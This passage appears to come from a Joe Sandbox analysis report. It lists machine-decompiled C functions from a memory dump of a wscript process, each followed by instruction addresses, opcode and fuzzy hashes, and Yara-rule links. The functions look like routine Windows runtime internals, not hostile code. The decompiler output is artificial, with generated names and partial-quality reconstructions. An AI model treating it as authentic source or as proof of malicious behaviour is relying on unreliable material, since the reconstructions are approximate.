						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x5a35368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x5a3536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0597A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0597a61c
0x0597a61e
0x0597a623
0x0597a628
0x0597a62b
0x0597a62d
0x0597a648
0x0597a64a
0x0597a64f
0x059b9b44
0x0597a6ec
0x0597a6f1
0x0597a6f1
0x0597a655
0x0597a657
0x0597a65a
0x0597a65d
0x0597a662
0x0597a663
0x0597a667
0x0597a668
0x0597a66d
0x0597a706
0x0597a706
0x059b9bda
0x059b9be6
0x059b9beb
0x00000000
0x059b9beb
0x0597a679
0x059b9b7a
0x00000000
0x059b9b7a
0x0597a683
0x0597a6f4
0x0597a6f7
0x0597a6f9
0x0597a6fd
0x0597a6a0
0x0597a6a0
0x0597a6ad
0x0597a6af
0x0597a6b4
0x059b9ba7
0x059b9bac
0x00000000
0x00000000
0x059b9bc6
0x059b9bce
0x059b9bd1
0x059b9bd3
0x059b9bd3
0x00000000
0x059b9bd1
0x0597a6bd
0x0597a6c3
0x0597a6c6
0x0597a6d2
0x0597a701
0x0597a704
0x00000000
0x0597a704
0x0597a6d4
0x0597a6d6
0x0597a6d9
0x0597a6db
0x0597a6e1
0x0597a6e6
0x0597a6e8
0x0597a6e8
0x0597a6ea
0x00000000
0x0597a6ea
0x0597a688
0x0597a692
0x0597a694
0x0597a699
0x00000000
0x00000000
0x0597a69d
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e346cc410f4820ecb18bdb43976504a7a3d370f175d4c6e97ac68f2948ea625
Instruction ID: 92ee659ecd7e3ad5609da283b3681c8456a8534410f1c377b48042606015355f
Opcode Fuzzy Hash: 7e346cc410f4820ecb18bdb43976504a7a3d370f175d4c6e97ac68f2948ea625
Instruction Fuzzy Hash: A54158B5A14219DFDF05CF58C990B9DBBF6FF89304F1980AAE905AB344C774A901CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0596C182 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0596C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E05967D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E05A18D34(_v8, _t80);
					}
					E05962280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0595FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E05A18833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0595FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0598B180();
						if(_a4 != 0) {
							E05962280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0596BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0596BB2D(_t16, _t15);
						E0596B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0595FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0595FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0595FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x0596c18d
0x0596c18f
0x0596c191
0x0596c19b
0x0596c1a0
0x0596c1d4
0x0596c1de
0x059b2d6e
0x0596c1e4
0x0596c1e4
0x0596c1e4
0x0596c1ec
0x059b2d7d
0x059b2d7d
0x0596c1f3
0x0596c1ff
0x059b2d88
0x059b2d8d
0x059b2d94
0x059b2d94
0x059b2d9f
0x059b2da4
0x059b2dab
0x059b2db0
0x059b2db2
0x059b2db3
0x059b2db4
0x059b2dbc
0x059b2dc3
0x059b2dc3
0x0596c205
0x0596c205
0x0596c208
0x0596c20e
0x0596c211
0x0596c216
0x0596c219
0x0596c21f
0x0596c222
0x0596c22c
0x0596c234
0x0596c23a
0x0596c23f
0x0596c245
0x0596c24b
0x0596c251
0x0596c25a
0x0596c276
0x0596c27d
0x0596c27d
0x0596c25c
0x0596c25c
0x00000000
0x0596c25e
0x0596c1a4
0x0596c1aa
0x0596c1b3
0x0596c265
0x0596c26c
0x0596c26c
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 91e159cd4f2d964ea86588a8b80cf7270837afb3c1e21e06337a7796b87290fe
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: C8313771701586BEDB04EBB4C584BF9FB59BF82214F04415AE85C87201DB38BA1DCBA0

Uniqueness

Uniqueness Score: -1.00%

Function 059C7016 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E059C7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x5a3d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E059C6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E059C6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E05967D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E05989AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0598B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L05964620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x059c7016
0x059c701e
0x059c702b
0x059c7033
0x059c7037
0x059c703c
0x059c703e
0x059c7041
0x059c7045
0x059c704a
0x059c7050
0x059c7055
0x059c705a
0x059c7062
0x059c7062
0x059c705a
0x059c7064
0x059c7064
0x059c7067
0x059c7071
0x059c7096
0x059c709b
0x059c70a2
0x059c70a6
0x059c70a7
0x059c70ad
0x059c70b3
0x059c70b6
0x059c70bb
0x059c70c3
0x059c70c3
0x059c70c6
0x059c70cd
0x059c70dd
0x059c70e0
0x059c70e2
0x059c70e2
0x059c70ee
0x059c7101
0x059c70f0
0x059c70f9
0x059c70f9
0x059c710a
0x059c710e
0x059c7112
0x059c7117
0x059c7118
0x059c7118
0x059c70bb
0x059c711d
0x059c7123
0x059c7131
0x059c7131
0x059c7136
0x059c713d
0x059c713e
0x059c713f
0x059c714a
0x059c714a
0x059c7084
0x059c7088
0x00000000
0x059c708e
0x059c708e
0x059c7092
0x00000000
0x059c7092

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29f0c3ddcb6a5e8fbc0c0a70485e656cc7e0df13fa267fd5b1bfe2da9406d7f5
Instruction ID: e692726ee64327af60258b3ec079029d1aa42f25812cc7bd1e7f438147f2dc99
Opcode Fuzzy Hash: 29f0c3ddcb6a5e8fbc0c0a70485e656cc7e0df13fa267fd5b1bfe2da9406d7f5
Instruction Fuzzy Hash: 8C31A4726087519BC320DF68C945A7AB7E9FFC8700F044A6DF89687690E730E904CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 05986DE6 Relevance: .1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E05986DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t59;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				void* _t68;
				intOrPtr _t69;
				signed int _t73;
				signed int _t75;
				intOrPtr _t77;
				signed int _t80;
				intOrPtr _t82;

				_t68 = __edx;
				_push(__ecx);
				_t80 = __ecx;
				_t75 = _a4;
				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
					L23:
					asm("lock inc dword [esi+0x110]");
					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
						asm("lock inc dword [ecx+eax+0x4]");
					}
					_t39 = 0;
					L13:
					return _t39;
				}
				_t63 =  *(__ecx + 0x88);
				_t4 = _t68 + 7; // 0xa
				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
				_t59 = _t4 & 0xfffffff8;
				_v8 = _t69;
				if(_t75 >= _t63) {
					_t75 = _t75 % _t63;
					L15:
					_t69 = _v8;
				}
				_t64 =  *((intOrPtr*)(_t80 + 0x17c + _t75 * 4));
				if(_t64 == 0) {
					L14:
					if(E05986EBE(_t80, _t64, _t75) != 1) {
						goto L23;
					}
					goto L15;
				}
				asm("lock inc dword [ecx+0xc]");
				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
					goto L14;
				} else {
					_t73 = _t59;
					asm("lock xadd [eax], edx");
					if(_t73 + _t59 > _v8) {
						if(_t73 <= _v8) {
							 *(_t64 + 4) = _t73;
						}
						goto L14;
					}
					_t77 = _t73 + _t64;
					_v8 = _t77;
					 *_a12 = _t64;
					_t66 = _a8;
					if(_t66 == 0) {
						L12:
						_t39 = _t77;
						goto L13;
					}
					_t52 =  *((intOrPtr*)(_t80 + 0x10));
					if(_t52 != 0) {
						_t53 = _t52 - 1;
						if(_t53 == 0) {
							asm("rdtsc");
							 *_t66 = _t53;
							L11:
							 *(_t66 + 4) = _t73;
							goto L12;
						}
						E05976A60(_t66);
						goto L12;
					}
					while(1) {
						_t73 =  *0x7ffe0018;
						_t82 =  *0x7FFE0014;
						if(_t73 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_t66 = _a8;
					_t77 = _v8;
					 *_t66 = _t82;
					goto L11;
				}
			}

0x05986de6
0x05986dee
0x05986df1
0x05986df4
0x05986dfd
0x059c05d3
0x059c05d3
0x059c05e4
0x059c05f9
0x059c05f9
0x059c05fe
0x05986e96
0x05986e9c
0x05986e9c
0x05986e03
0x05986e09
0x05986e0c
0x05986e12
0x05986e15
0x05986e1b
0x059c05a1
0x05986eb1
0x05986eb1
0x05986eb1
0x05986e21
0x05986e2a
0x05986e9f
0x05986eab
0x00000000
0x00000000
0x00000000
0x05986eab
0x05986e2c
0x05986e34
0x00000000
0x05986e3d
0x05986e3d
0x05986e42
0x05986e4d
0x059c05ac
0x059c05b2
0x059c05b2
0x00000000
0x059c05ac
0x05986e56
0x05986e59
0x05986e5d
0x05986e5f
0x05986e64
0x05986e94
0x05986e94
0x00000000
0x05986e94
0x05986e6a
0x05986e6d
0x059c05ba
0x059c05bd
0x059c05ca
0x059c05cc
0x05986e91
0x05986e91
0x00000000
0x05986e91
0x059c05c0
0x00000000
0x059c05c0
0x05986e7e
0x05986e7e
0x05986e80
0x05986e86
0x00000000
0x00000000
0x05986eba
0x05986eba
0x05986e88
0x05986e8b
0x05986e8f
0x00000000
0x05986e8f

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
Instruction ID: 48fb2b3abeb036cc774b17b85630c118e1ee73e5bae3d0045fb50d7f81ebd95b
Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
Instruction Fuzzy Hash: 54318931208205DFC728DF69C184ABAB7AAFF95314B14C95EE41A8F242DB31F812CB90

Uniqueness

Uniqueness Score: -1.00%

Function 059F3D40 Relevance: .1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E059F3D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x5a3d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E05962280(_t34, 0x5a38a6c);
				_t64 =  *0x5a35768; // 0x77995768
				if(_t64 != 0x5a35768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77995770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E0595FFB0(_t53, _t64, 0x5a38a6c);
						 *0x5a3b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E05962280(_t45, 0x5a38a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x5a35768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E0595FFB0(_t51, _t64, 0x5a38a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0598B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x059f3d40
0x059f3d48
0x059f3d52
0x059f3d59
0x059f3d5d
0x059f3d61
0x059f3d63
0x059f3d67
0x059f3d69
0x059f3d72
0x059f3d76
0x059f3d7a
0x059f3d7f
0x059f3d8b
0x059f3d91
0x059f3d91
0x059f3d91
0x059f3d94
0x059f3d96
0x059f3d9d
0x059f3da1
0x059f3db0
0x059f3dba
0x059f3dbc
0x059f3dbc
0x059f3dc6
0x059f3dcb
0x059f3dcf
0x059f3dd1
0x059f3dd4
0x00000000
0x00000000
0x059f3dd9
0x059f3e0c
0x059f3e0c
0x059f3e0f
0x059f3ddb
0x059f3ddb
0x059f3de0
0x00000000
0x059f3de2
0x059f3de2
0x059f3de4
0x059f3de8
0x059f3deb
0x059f3df1
0x00000000
0x059f3df3
0x059f3df3
0x059f3df5
0x059f3df8
0x059f3dfa
0x00000000
0x059f3dfa
0x059f3df1
0x059f3de0
0x059f3e11
0x059f3e11
0x00000000
0x059f3dfe
0x059f3e04
0x059f3e06
0x00000000
0x059f3e06
0x00000000
0x059f3e04
0x059f3d91
0x059f3e15
0x059f3e1a
0x059f3e1f
0x059f3e1f
0x059f3e23
0x059f3e29
0x00000000
0x00000000
0x059f3e2e
0x00000000
0x059f3e30
0x059f3e30
0x059f3e35
0x00000000
0x059f3e37
0x059f3e3e
0x059f3e42
0x059f3e48
0x059f3e4e
0x00000000
0x059f3e4e
0x059f3e35
0x00000000
0x059f3e2e
0x059f3e5b
0x059f3e5c
0x059f3e5d
0x059f3e68
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af57a74b7246666f79024f58a890b1c0b56d41995e3db46970b0a21963cddd8e
Instruction ID: 4e778a645170f54db696b4c72a4c674c9fe39e6f5809258f6e5183eca72b032a
Opcode Fuzzy Hash: af57a74b7246666f79024f58a890b1c0b56d41995e3db46970b0a21963cddd8e
Instruction Fuzzy Hash: 4F3199B1A09302DFCB10DF28D48582ABFE6FF85714F05496EF9888B250D734E908CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0597A70E Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0597A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x5a37b10; // 0x10
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x5a37b10 = 8;
					 *0x5a37b14 = 0x5a37b0c;
					 *0x5a37b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x11
					E0597A990(0x5a37b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0597A840(__edx, __ecx, __ecx, _t52, 0x5a37b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x5a37b10; // 0x10
					_t3 = _t37 + 0x27; // 0x37
					__eflags = _t3 >> 5 -  *0x5a37b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x5a37b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x37
						_v8 = _t4 >> 5;
						_t50 = L05964620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x5a37b18 = _v8;
						_t8 = _t52 + 7; // 0x17
						E0598F3E0(_t50,  *0x5a37b14, _t8 >> 3);
						_t28 =  *0x5a37b14; // 0x77997b0c
						__eflags = _t28 - 0x5a37b0c;
						if(_t28 != 0x5a37b0c) {
							L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x18
						 *0x5a37b14 = _t50;
						_t48 = _v12;
						 *0x5a37b10 = _t9;
						goto L6;
					}
					 *0x5a37b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0597a713
0x0597a714
0x0597a717
0x0597a71d
0x0597a720
0x0597a722
0x0597a727
0x0597a74a
0x0597a754
0x0597a75e
0x0597a768
0x0597a76a
0x0597a773
0x0597a78b
0x0597a790
0x0597a792
0x0597a741
0x0597a741
0x0597a743
0x0597a749
0x0597a749
0x0597a732
0x0597a73a
0x0597a797
0x0597a79d
0x0597a7a3
0x0597a7a9
0x0597a7b6
0x0597a7bc
0x0597a7ca
0x0597a7e0
0x0597a7e2
0x0597a7e4
0x059b9bf2
0x00000000
0x059b9bf2
0x0597a7ed
0x0597a7f2
0x0597a800
0x0597a805
0x0597a80d
0x0597a812
0x059b9c08
0x059b9c08
0x0597a818
0x0597a81b
0x0597a821
0x0597a824
0x00000000
0x0597a824
0x0597a7ae
0x00000000
0x0597a7ae
0x0597a73c
0x0597a73e
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d1f7880bd2dccf33c054fd152700d23d9c7d665fcf3c437aad30dd8673121dc
Instruction ID: 4a75349cf217d4e1b40889f9b17c05901417c7fe217d6d64e22f8f28afb6aaaa
Opcode Fuzzy Hash: 8d1f7880bd2dccf33c054fd152700d23d9c7d665fcf3c437aad30dd8673121dc
Instruction Fuzzy Hash: 813180F16282089FD711CF18DC82F6D7BFAFB85714F14499AF01687241DB74AA02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 059761A0 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E059761A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E05975E50(0x59267cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E05A19D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0594F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x059761b3
0x059761b5
0x059761bd
0x059761c3
0x059761c7
0x059761d2
0x059761ff
0x059761ff
0x05976201
0x05976207
0x05976207
0x059761d4
0x059761d9
0x00000000
0x00000000
0x059761df
0x059761e2
0x00000000
0x00000000
0x059761e6
0x059761e8
0x059761ee
0x059761ee
0x059761f9
0x059b762f
0x059b7632
0x059b7635
0x059b7639
0x059b7640
0x059b766e
0x059b7675
0x00000000
0x00000000
0x059b7681
0x059b7689
0x059b768d
0x059b7691
0x059b7695
0x059b7699
0x059b76af
0x059b76b5
0x059b76b7
0x059b76b7
0x059b76d7
0x059b76dc
0x00000000
0x059b76dc
0x059b76a2
0x059b76a9
0x059b7651
0x059b7653
0x059b7653
0x059b7656
0x059b7656
0x00000000
0x059b7656
0x059b7644
0x059b7646
0x059b7648
0x059b7648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
